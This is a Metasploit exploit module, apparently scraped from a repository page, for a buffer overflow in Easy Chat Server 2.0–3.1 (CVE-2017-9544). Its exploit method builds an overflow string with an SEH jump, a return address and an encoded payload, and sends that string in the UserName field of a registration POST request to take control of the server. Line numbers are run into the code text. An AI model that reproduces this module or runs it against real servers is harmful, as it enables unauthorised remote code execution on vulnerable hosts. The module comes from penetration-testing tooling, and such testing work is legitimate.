Path: blob/master/modules/exploits/windows/http/easychatserver_seh.rb
23728 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = NormalRanking89include Msf::Exploit::Remote::HttpClient1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',16'Description' => %q{17This module exploits a buffer overflow during user registration in Easy Chat Server software.18},19'Author' => [20'Marco Rivoli', # Metasploit21'Aitezaz Mohsin' # POC22],23'License' => MSF_LICENSE,24'References' => [25[ 'CVE', '2017-9544' ],26[ 'EDB', '42155' ],27],28'Privileged' => true,29'Payload' => {30'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",31},32'Platform' => 'win',33'Targets' => [34[ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],35],36'DefaultOptions' => {37'RPORT' => 80,38'EXITFUNC' => 'thread',39'ENCODER' => 'x86/alpha_mixed'40},41'DisclosureDate' => '2017-10-09',42'DefaultTarget' => 0,43'Notes' => {44'Reliability' => UNKNOWN_RELIABILITY,45'Stability' => UNKNOWN_STABILITY,46'SideEffects' => UNKNOWN_SIDE_EFFECTS47}48)49)50end5152def exploit53sploit = rand_text_alpha_upper(217)54sploit << "\xeb\x06\x90\x90"55sploit << [target.ret].pack('V')56sploit << payload.encoded57sploit << rand_text_alpha_upper(200)5859res = send_request_cgi({60'uri' => normalize_uri(URI, 'registresult.htm'),61'method' => 'POST',62'vars_post' => {63'UserName' => sploit,64'Password' => 'test',65'Password1' => 'test',66'Sex' => 1,67'Email' => 'x@',68'Icon' => 'x.gif',69'Resume' => 'xxxx',70'cw' => 1,71'RoomID' => 4,72'RepUserName' => 'admin',73'submit1' => 'Register'74}75})76handler77end78end798081